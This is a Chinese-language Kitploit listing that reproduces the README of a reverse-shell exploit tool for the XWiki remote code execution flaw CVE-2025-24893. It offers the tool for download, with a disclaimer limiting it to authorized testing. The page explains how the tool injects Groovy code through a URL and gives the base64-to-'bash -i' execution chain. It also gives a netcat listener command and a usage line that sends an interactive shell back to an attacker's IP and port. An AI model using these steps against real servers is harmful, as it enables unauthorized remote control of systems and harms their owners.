Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
xwiki-15.10.8-reverse-shell-cve-2025-24893 — CVE-2025-24893 针对XWiki的RCE漏洞利用,具备反弹Shell功能 | Kitploit
工具/GitHubGitHub/bishben/xwiki-15.10.8-reverse-shell-cve-2025-24893
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubbishben/xwiki-15.10.8-reverse-shell-cve-2025-24893

xwiki-15.10.8-reverse-shell-cve-2025-24893

CVE-2025-24893 针对XWiki的RCE漏洞利用,具备反弹Shell功能

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
361年前尚未审核

CVE-2025-24893 XWiki 反向 Shell 利用脚本

免责声明: 此脚本仅用于教育目的和授权的安全测试。请勿在您不拥有或未经明确许可的系统上使用。滥用可能导致非法和危险后果。

描述

该 Python 脚本利用 CVE-2025-24893,这是一个影响 XWiki 版本直至 15.10.10 的远程代码执行漏洞。

  • 测试版本: XWiki 15.10.8
  • 影响: 允许在目标服务器上执行任意命令。
  • Python 版本: 使用 Python 3 编写和测试

此版本扩展了 Al Baradi Joy 的原始 PoC,以生成一个反向 Shell。原始 PoC 可在此处找到。

工作原理

  • XWiki 通过 URL 参数执行 Groovy 代码。

  • 利用脚本将 bash -c 命令注入到该 Groovy 模板中。

  • 正常的反向 Shell 包含多个引号(' 和 "),这会破坏 Groovy 的求值以及 URL。

  • 为解决此问题,脚本将单行 Shell 命令以 Base64 编码。

  • 然后有效载荷通过 URL 发送,并使用以下链执行:

    {echo,<base64>} | {base64,-d} | {bash,-i}

  • 这会安全地解码 Base64 有效载荷并使用 bash -i 执行,从而提供一个交互式反向 Shell。

目标 URL 格式

  • 格式: http://<目标主机>
  • 请勿包含:
    • 末尾的斜杠 /
    • /xwiki 路径(脚本会自动追加)

示例:

root@kitploit:~
# 正确
http://10.129.95.114:8080
http://example.com:8080

# 错误
http://10.129.95.114:8080/         # 末尾有斜杠
http://example.com/xwiki            # 包含 /xwiki

监听器设置

在运行利用之前,您必须启动一个监听器来接收反向 Shell。

使用 Netcat 的示例:

root@kitploit:~
nc -lvnp <lport>
  • <lport> 应与您提供给脚本的参数端口匹配。

使用方法

root@kitploit:~
python3 cve-2025-24893.py <目标基础URL> <本地主机IP> <本地端口>

示例:

root@kitploit:~
python3 cve-2025-24893.py http://10.129.95.114:8080 10.0.0.5 4444
  • 脚本会打印完整的利用 URL、Base64 有效载荷以及检查监听器的说明。

参考

  • GHSA 安全公告
  • XWiki 主页
  • 原始 PoC 作者:Al Baradi Joy

致谢

  • 原始概念验证:Al Baradi Joy
  • 此版本:升级为生成反向 Shell,以实现交互式命令执行

警告

  • 仅在受控环境(HTB、实验机器、您拥有的虚拟机)中使用此利用脚本。
  • 在公共服务器上未经授权使用是违法的,可能导致刑事指控。
下载工具